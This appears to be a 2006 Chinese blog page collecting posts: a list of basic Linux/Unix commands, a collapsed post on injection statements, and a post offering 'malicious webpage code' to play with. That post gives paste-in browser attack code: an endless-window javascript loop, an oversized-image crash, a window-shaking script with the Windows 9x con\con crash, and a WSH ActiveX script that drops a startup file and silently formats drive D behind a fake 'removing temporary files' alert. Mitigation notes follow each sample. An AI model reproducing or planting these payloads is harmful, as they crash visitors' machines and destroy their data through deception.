LINUX/UNIX 基本的命令
useradd/adduser 建立帐号 (此命令只准许 root 系统管理者 专用的命令 目的是用来建
立新的使用者帐号)
cd 更换目录 (跟dos命令功能一样啦 只不过 linux/unix 目录是 "/" 而不
是 "\"罢了 其它差不多)
ls 查看目录 (跟dos命令 dir 一样 目的当然是查看目录的内容棉! 不过这
边的用法有蛮多变化 自行研究)
mkdir 建立目录 (同dos md 一样意思棉!)
cp 拷贝档案 (同dos copy 一样意思棉!)
mv 搬移档案 (同dos move 一样意思棉!)
rm 删除目录 (同dos del/rd 一样意思棉!)
or 档案
cat 列出档案 (同dos type 一样意思棉!)
more 显示一页 (同dos more 一样意思棉!)
passwd 更改密码 (当然就是 可以更改密码棉! 您自己可以自行换新密码 当然
只能改自己的帐号密码 除非您是 root)
pwd 目前目录 (显示出目前的工作目录)
ln 建立连结 (用来连结不同的目录/档案)
chmod 改变模式 (用来改变档案的模式 因linux/unix 模式有很多类别 在此不
讨论 有兴趣自行去买书来研究吧!)
chown 更改档案 (这功能可能需 root 方能使用 要看对方是否有设权限而定)
拥有者
chgrp 更改群组 (这功能可能需 root 方能使用 要看对方是否有设权限而定)
拥有者
rmdir 删除目录
find 找寻档案 (这功能会用的到 目的当然是找出您要找的档案存放的位置)
nohup (可用在离开系统时 执行程式)
pg 浏漤档案 (限定 文字档案 型态)
vi 文书编辑 (简易的 linux/unix 专用的 文书编辑程式)
su 变成root (此命令非常好用 不过大部份的 root 都会改名字 以免被盗
用 这是用来变成 超级使用者 root 的命令 会用的到)

posted @ 2006-10-08 18:07 stone' 阅读(0) | 评论 (0)编辑 收藏

标准注入语句

    内容篇幅较长,请点击这里阅读全文。

posted @ 2006-10-08 16:14 stone' 阅读(2) | 评论 (0)编辑 收藏

发几种网页的恶意代码大家有兴趣的话拿去玩玩

A、死循环代码:
『把下列代码加入到网页中,可达到如上效果』
<img src=javascript:location=“网页的文件名.htm:”>

说明:当含有这段代码的网页被人点击,连接就会不断的打开IE浏览器,直到你的系统资源浪费到0%~只有重新启动才能正常使用!

预防方法:禁用所有的ActiveX控件和插件!因为这是一个ActiveX教本程序~

B、恐怖的大图片:
『把下列代码加入到网页中,可达到如上效果』
<img src= "http://恐怖图片的连接地址" width= "1" height= "100000000000000000000000">

说明:当打开这样的网页,IE会不断的解释试图打开,但由于图片实在太大,超出了其处理能力,所以……

C、地震死机代码:
『把下列代码加入到网页中,可达到如上效果』
<script>
if (window.top.moveBy){
for (i = 1;i < 50; i++){
for (j = 3;j > 0; j--){
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i*2);
window.top.moveBy(-i*2,0);
window.top.moveBy(0,i);
window.top.moveBy(i,0);
}
}
}
</script>
<img src="c:\con\con">

说明:<img src="c:\con\con">是windows9x的设备名称解析漏洞!
WINDOWS9x的\con\con设备名称解析漏洞允许用户进行攻击,倒是98死机。原理:我们知道,CON是DOS下的特殊设备名,不允许做文件名,如果我们在DOS下键入如下命令:copy coldcrysky.txt con,系统会显示coldcrysky.txt的内容,如果换成:copy coldcrysky.txt>con系统会提示文件不能拷贝到文件自身。如果吧con换成LPT或PRN,则输出coldcrysky.txt到打印机。由此可见,CON代表文件本身,如果使用\CON\CON命令,则意味着系统不断调用文件本身,视系统资源迅速枯竭,连按CTRL+ALT+DEL的机会都没有~
解决办法:
对于9X系统,强烈建议打补丁!!!2000和XP则不会死机~

D、格式化硬盘:(最恐怖的~~~慎用!!!请勿用于非法用途!!!使用后如果有任何负作用,后果自负!与伤寒天空『ColdCrySky』;乱刀留影无关!!!)

scr,Reset();
scr.Path="C:\\WINDOWS\\StartMenu\\Programs\\启动\\startup.htm";
scr.Doc="<object id=`wsh` classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`>"
WSH.rUN(`start/m format.com d:/q/autotest/u`);
alert(`IMPORTANT : Windows is removing unused temporary files.`);
scr.write();

说明:当您浏览了网页,会把startup.hta文件写入启动文件夹,并提示WINDOWS正在删除临时文件!实际上是在格式化你的D盘,代码中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B对应为:Windows Scripting Host Shell Object。代码中的:WSH全称是:Windows Scripting Host,是微软的一种基于32位系统平台与语言无关的教本解释机制,它使得脚本能在WINDOWS桌面或命令提示符下运行~WSH所对应的程序WScript.exe是一个脚本语言解释器,位于WINDOWS所在文件夹下,所以它可以像执行批处理文件一样执行WSH脚本程序~
解决方法:1)更新您的浏览器,使用最新的浏览器上网!
2)修改msdos.sys,在其中加入:Bootmentu=0命令行,目的是禁用启动菜单。
3)吧format.com改名
4)禁用WSH。具体方法:在win98中,从添加删除程序中点击WINDOWS安装程序,打开附件一项,将WINDOWS SCRIPTING HOST前面的选项去掉,就可以卸载掉WSH了~~~win2000和xp的用户可以在我的电脑-工具菜单-文件夹选项-选择文件类型,找到VBS VBSCRIPT FILE选项,点击删除!